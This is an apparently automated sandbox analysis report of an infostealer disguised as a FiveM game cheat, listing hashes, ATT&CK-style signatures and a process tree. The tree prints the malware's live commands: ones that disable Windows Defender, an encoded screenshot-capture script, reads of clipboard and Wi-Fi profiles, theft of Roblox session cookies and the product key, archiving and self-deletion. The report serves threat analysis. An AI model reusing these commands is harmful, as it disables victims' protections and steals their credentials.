Analysis

  • max time kernel
    105s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/03/2025, 03:24

General

  • Target

    FivemCheat.exe

  • Size

    7.6MB

  • MD5

    a48eda18e6d377aa7f61472d2522cae5

  • SHA1

    2865a89c5492ccd1e79c75a4d44ddb0c90fe12e9

  • SHA256

    00b8176ed414597f955681a8dfa4bb9d45e0832469fd5efe876c625e13f67b8a

  • SHA512

    8e5131ba5a475e578966ab40a50389f086ec81850f14cb0f5be24b7e6fd6015ff346c40cf00cca25b8cec971afcfd3fcdbecc2241e52de3492f8e7b1fa91b0f1

  • SSDEEP

    196608:K068x7lvwfI9jUCD6rlaZLH7qRGrGIYUoZy8FUsOnAoz:Z7GIH20drLYRZjoz

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 53 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\FivemCheat.exe
    "C:\Users\Admin\AppData\Local\Temp\FivemCheat.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2396
    • C:\Users\Admin\AppData\Local\Temp\FivemCheat.exe
      "C:\Users\Admin\AppData\Local\Temp\FivemCheat.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1616
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FivemCheat.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4704
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FivemCheat.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4016
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4768
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:544
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\FivemCheat.exe""
        3⤵
        • Hide Artifacts: Hidden Files and Directories
        • Suspicious use of WriteProcessMemory
        PID:4624
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\FivemCheat.exe"
          4⤵
          • Views/modifies file attributes
          PID:4676
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4116
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4632
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3132
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4748
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:220
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4940
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4312
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3736
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5376
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1756
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:1604
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:2844
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:2708
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1984
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:1060
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4144
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:5452
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3512
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5200
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ml3hsinu\ml3hsinu.cmdline"
                5⤵
                  PID:2980
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5294.tmp" "c:\Users\Admin\AppData\Local\Temp\ml3hsinu\CSC43B3DADE69AC49F580CEEA575EB7D468.TMP"
                    6⤵
                      PID:1948
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1808
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4656
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:2392
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:3232
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:628
                      • C:\Windows\system32\attrib.exe
                        attrib -r C:\Windows\System32\drivers\etc\hosts
                        4⤵
                        • Drops file in Drivers directory
                        • Views/modifies file attributes
                        PID:4884
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                      3⤵
                        PID:1364
                        • C:\Windows\system32\attrib.exe
                          attrib +r C:\Windows\System32\drivers\etc\hosts
                          4⤵
                          • Drops file in Drivers directory
                          • Views/modifies file attributes
                          PID:1684
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:996
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:2036
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                            3⤵
                              PID:5456
                              • C:\Windows\system32\tasklist.exe
                                tasklist /FO LIST
                                4⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:904
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:2776
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:736
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:3508
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:3324
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      3⤵
                                        PID:5648
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5844
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        3⤵
                                          PID:4548
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2308
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "getmac"
                                          3⤵
                                            PID:4692
                                            • C:\Windows\system32\getmac.exe
                                              getmac
                                              4⤵
                                                PID:4184
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI23962\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\nPjlI.zip" *"
                                              3⤵
                                                PID:5924
                                                • C:\Users\Admin\AppData\Local\Temp\_MEI23962\rar.exe
                                                  C:\Users\Admin\AppData\Local\Temp\_MEI23962\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\nPjlI.zip" *
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:2948
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                3⤵
                                                  PID:2740
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic os get Caption
                                                    4⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5572
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                  3⤵
                                                    PID:220
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic computersystem get totalphysicalmemory
                                                      4⤵
                                                        PID:3436
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                      3⤵
                                                        PID:4840
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic csproduct get uuid
                                                          4⤵
                                                            PID:5464
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                          3⤵
                                                            PID:5452
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:4720
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                            3⤵
                                                              PID:2068
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic path win32_VideoController get name
                                                                4⤵
                                                                • Detects videocard installed
                                                                PID:2400
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                              3⤵
                                                                PID:3408
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:452
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\FivemCheat.exe""
                                                                3⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                PID:4496
